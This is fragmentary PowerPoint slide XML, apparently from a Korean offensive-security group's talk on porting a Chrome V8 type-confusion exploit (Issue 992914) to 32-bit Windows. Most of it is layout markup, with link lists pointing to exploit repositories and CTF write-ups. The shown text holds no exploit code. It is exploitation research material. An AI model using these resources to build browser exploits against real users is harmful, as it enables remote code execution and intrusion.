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95" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId25"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="271" r:id="rId3"/>
    <p:sldId id="270" r:id="rId4"/>
    <p:sldId id="272" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="276" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="277" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="280" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="283" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="284" r:id="rId17"/>
    <p:sldId id="288" r:id="rId18"/>
    <p:sldId id="285" r:id="rId19"/>
    <p:sldId id="289" r:id="rId20"/>
    <p:sldId id="290" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="287" r:id="rId23"/>
    <p:sldId id="26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lear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:italic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId36"/>
      <p:bold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스트 오컬트" initials="이오" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="24c77d7ab4e39d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0304"/>
    <a:srgbClr val="4B82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1" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="172" d="100"/>
          <a:sy n="172" d="100"/>
        </p:scale>
        <p:origin x="138" y="288"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="138" d="100"/>
          <a:sy n="138" d="100"/>
        </p:scale>
        <p:origin x="3738"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C352A-B093-4AC9-8951-7F93AD567FCE}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28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B8061-8CF5-4873-ACE1-F0B34A5DF62C}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41805226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741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2854F0EF-10FB-4A6A-9E42-C1EDB3BB02ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="733616"/>
            <a:ext cx="12192000" cy="6130902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;1273;p63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2081CFBF-C157-4DC7-B8DB-B53AADA80877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="697154"/>
            <a:ext cx="12188824" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="2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7" name="그림 6" descr="동물이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6CAE11C-F871-466F-B4CB-502F0231F9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28799" y="101586"/>
            <a:ext cx="1417247" cy="523686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:srgbClr val="002060">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="슬라이드 번호 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA90CD8-A4A3-43C6-8A03-C26D8AE92675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751284" y="6622182"/>
            <a:ext cx="686255" cy="230832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000">
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="날짜 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A724AB-0A94-4846-9B97-BD31C38101AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11319831" y="6627168"/>
            <a:ext cx="826351" cy="230832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{08755E75-5DD1-4E9F-8A81-6B59E48A4E4E}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96300447"/>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heme" Target="../theme/theme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57D90B-A0BA-4D60-A8D3-2A63CDB66E5F}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR"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ko-KR"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3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR"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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F900FA7-C6F5-4CA9-BBC8-FF5CC2EDBD52}"/>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220" y="0"/>
            <a:ext cx="12196219"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82BFCBD9-C30E-430B-9174-CE77D1AFE865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8333187" y="752362"/>
            <a:ext cx="2396971" cy="1944216"/>
            <a:chOff x="601497" y="548680"/>
            <a:chExt cx="1679625" cy="1329397"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4C375A-91F4-49E8-946C-16CB6F51F462}"/>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backgroundMark x1="18280" y1="24923" x2="18280" y2="24923"/>
                        </a14:backgroundRemoval>
                      </a14:imgEffect>
                      <a14:imgEffect>
                        <a14:artisticPencilSketch/>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3742" y="548680"/>
              <a:ext cx="1181884" cy="1031196"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="38100">
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="26000"/>
                </a:schemeClr>
              </a:glo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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FB77DB8-6F72-4ED8-9413-7650EF937F0C}"/>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foregroundMark x1="48295" y1="97447" x2="26705" y2="94043"/>
                          <a14:foregroundMark x1="46023" y1="93191" x2="77557" y2="82128"/>
                          <a14:foregroundMark x1="26989" y1="93191" x2="8239" y2="82128"/>
                          <a14:foregroundMark x1="8239" y1="83404" x2="1136" y2="67234"/>
                          <a14:foregroundMark x1="2841" y1="68936" x2="2273" y2="52766"/>
                          <a14:foregroundMark x1="36364" y1="10638" x2="32102" y2="11489"/>
                          <a14:foregroundMark x1="36080" y1="10638" x2="55682" y2="3404"/>
                          <a14:foregroundMark x1="57670" y1="3404" x2="79261" y2="6383"/>
                          <a14:foregroundMark x1="78693" y1="6383" x2="87216" y2="10638"/>
                          <a14:foregroundMark x1="86648" y1="11064" x2="95170" y2="21277"/>
                          <a14:foregroundMark x1="95170" y1="21702" x2="97159" y2="35319"/>
                          <a14:foregroundMark x1="97159" y1="35319" x2="94318" y2="48085"/>
                          <a14:foregroundMark x1="94318" y1="48085" x2="86080" y2="62979"/>
                          <a14:backgroundMark x1="7102" y1="11064" x2="38920" y2="57021"/>
                          <a14:backgroundMark x1="15057" y1="49787" x2="42898" y2="28511"/>
                          <a14:backgroundMark x1="51989" y1="43830" x2="94318" y2="76596"/>
                          <a14:backgroundMark x1="90909" y1="86809" x2="96875" y2="67660"/>
                          <a14:backgroundMark x1="96307" y1="89787" x2="99432" y2="82128"/>
                          <a14:backgroundMark x1="91477" y1="97447" x2="56818" y2="98723"/>
                          <a14:backgroundMark x1="89489" y1="76170" x2="98864" y2="58298"/>
                          <a14:backgroundMark x1="86648" y1="76170" x2="90341" y2="92340"/>
                          <a14:backgroundMark x1="78693" y1="70213" x2="38352" y2="64255"/>
                          <a14:backgroundMark x1="74148" y1="52340" x2="73580" y2="20851"/>
                          <a14:backgroundMark x1="79261" y1="55745" x2="85511" y2="34468"/>
                          <a14:backgroundMark x1="90625" y1="38298" x2="70170" y2="11489"/>
                          <a14:backgroundMark x1="87216" y1="23830" x2="79261" y2="14043"/>
                          <a14:backgroundMark x1="70739" y1="11064" x2="49432" y2="16596"/>
                          <a14:backgroundMark x1="65625" y1="23404" x2="44318" y2="25957"/>
                          <a14:backgroundMark x1="59375" y1="35319" x2="35795" y2="43404"/>
                          <a14:backgroundMark x1="41761" y1="24681" x2="30682" y2="26809"/>
                          <a14:backgroundMark x1="50568" y1="12340" x2="23011" y2="28511"/>
                          <a14:backgroundMark x1="19034" y1="18723" x2="2273" y2="3404"/>
                          <a14:backgroundMark x1="23011" y1="4681" x2="42898" y2="3404"/>
                          <a14:backgroundMark x1="44602" y1="3404" x2="52557" y2="426"/>
                          <a14:backgroundMark x1="61648" y1="851" x2="57386" y2="851"/>
                          <a14:backgroundMark x1="71307" y1="851" x2="71307" y2="851"/>
                          <a14:backgroundMark x1="73580" y1="1702" x2="79261" y2="1702"/>
                          <a14:backgroundMark x1="82386" y1="3404" x2="92898" y2="6809"/>
                          <a14:backgroundMark x1="94886" y1="6383" x2="94886" y2="11489"/>
                          <a14:backgroundMark x1="96875" y1="5106" x2="98580" y2="18298"/>
                          <a14:backgroundMark x1="27841" y1="9787" x2="14205" y2="5532"/>
                          <a14:backgroundMark x1="852" y1="3404" x2="2273" y2="26809"/>
                          <a14:backgroundMark x1="7102" y1="23404" x2="0" y2="34468"/>
                          <a14:backgroundMark x1="11648" y1="24681" x2="15057" y2="38298"/>
                          <a14:backgroundMark x1="11648" y1="42128" x2="7955" y2="61277"/>
                          <a14:backgroundMark x1="18750" y1="67234" x2="32670" y2="83830"/>
                          <a14:backgroundMark x1="23580" y1="55319" x2="36080" y2="73617"/>
                          <a14:backgroundMark x1="42045" y1="75319" x2="67614" y2="70213"/>
                          <a14:backgroundMark x1="46875" y1="85106" x2="69602" y2="73191"/>
                          <a14:backgroundMark x1="25852" y1="83404" x2="11648" y2="66383"/>
                          <a14:backgroundMark x1="7102" y1="91064" x2="2273" y2="82128"/>
                          <a14:backgroundMark x1="3125" y1="94468" x2="852" y2="73617"/>
                          <a14:backgroundMark x1="7955" y1="97021" x2="18750" y2="96170"/>
                          <a14:backgroundMark x1="21591" y1="98298" x2="34943" y2="99574"/>
                          <a14:backgroundMark x1="39489" y1="98723" x2="47727" y2="99149"/>
                          <a14:backgroundMark x1="852" y1="65957" x2="0" y2="67660"/>
                          <a14:backgroundMark x1="284" y1="64681" x2="284" y2="62979"/>
                        </a14:backgroundRemoval>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="601497" y="785791"/>
              <a:ext cx="1679625" cy="1092286"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="190500">
                <a:srgbClr val="BCEEFC">
                  <a:alpha val="8000"/>
                </a:srgb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192584051"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483807" r:id="rId1"/>
    <p:sldLayoutId id="2147483808" r:id="rId2"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1"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1"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sv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theori.io/pwnjs/index.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.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biblegateway.com/passage/?search=Deuteronomy+12%3A32&amp;version=KJV"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hyperlink" Target="https://github.com/AmesianX/v8_doare-helpers"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github.com/amesianx/Chrome_Issue992914"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7.sv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hyperlink" Target="https://github.com/exodusintel/Chrome-Issue-992914-Sealed-Frozen-Element-Kind-Type-Confusion-RCE-Exploit/tree/master/chrome_992914"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blog.exodusintel.com/2019/09/09/patch-gapping-chrom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hyperlink" Target="https://halbecaf.com/2017/05/24/exploiting-a-v8-oob-write/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Escapingbug/awesome-browser-exploit" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/5190" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danbev/learning-v8" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugs.chromium.org/p/chromium/issues/detail?id=594574" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@stankoja/v8-bug-hunting-part-2-memory-representation-of-js-types-ea37571276b8" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.usenix.org/sites/default/files/conference/protected-files/woot18_slides_gawlik.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.exodusintel.com/2019/04/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://eternalsakura13.com/2018/05/06/v8/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tunz/js-vuln-db" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@stankoja/v8-bug-hunting-part-1-setting-up-the-debug-environment-7ef34dc6f2de" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://changochen.github.io/2019-04-29-starctf-2019.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://openhome.cc/eGossip/WebAssembly/Wat2Wasm.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/papers/jit_exploitation.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jaybosamiya.com/blog/2019/01/02/krautflare/exploit_local.js" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xz.aliyun.com/t/5368" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://eternalsakura13.com/2018/11/19/justintime/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.powerofcommunity.net/poc2018/ned.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hackedteam/vector-exploit/tree/master/src" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vngkv123/aSiagaming/tree/master/Chrome-v8-oob" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/780/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jaybosamiya.com/blog/2019/01/02/krautflare/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tem.pw/?paged=4" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/push0ebp/v8-starter-guid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github.com/AmesianX/v8_doare-helpers" TargetMode="Externa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svg"/><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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F90111-63B8-4285-9443-3BF624BE51DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422028" y="4904497"/>
            <a:ext cx="9558999" cy="1151937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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000">
                <a:solidFill>
                  <a:srgbClr val="FBDD6D"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GNUSYSLAB is an Offensive Security Laboratory belonging to POWERHACKER.NET in South Korea.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FBDD6D"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We are a hungry freelance group with no jobs. In addition to computer security research, we are a group that studies occult mystery.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FBDD6D"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zero-day or 1-day is just an occult knowledge for us. It's no more or no less than that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FBDD6D"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Author: amesianx@gmail.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{739AF691-9C7B-4454-BF45-E8A89C3D5AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422028" y="4381277"/>
            <a:ext cx="11347943" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="28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How to convert “Chrome Issue992914” exploit to 32-bit on Windows</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF6DB98-DB38-4C06-9049-C2E918D1C680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704551" y="2767675"/>
            <a:ext cx="3641042"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GNUSYS SECURE INSIDE </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3039914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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="3943331"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ExodusIntel’s PoC Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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7" y="866181"/>
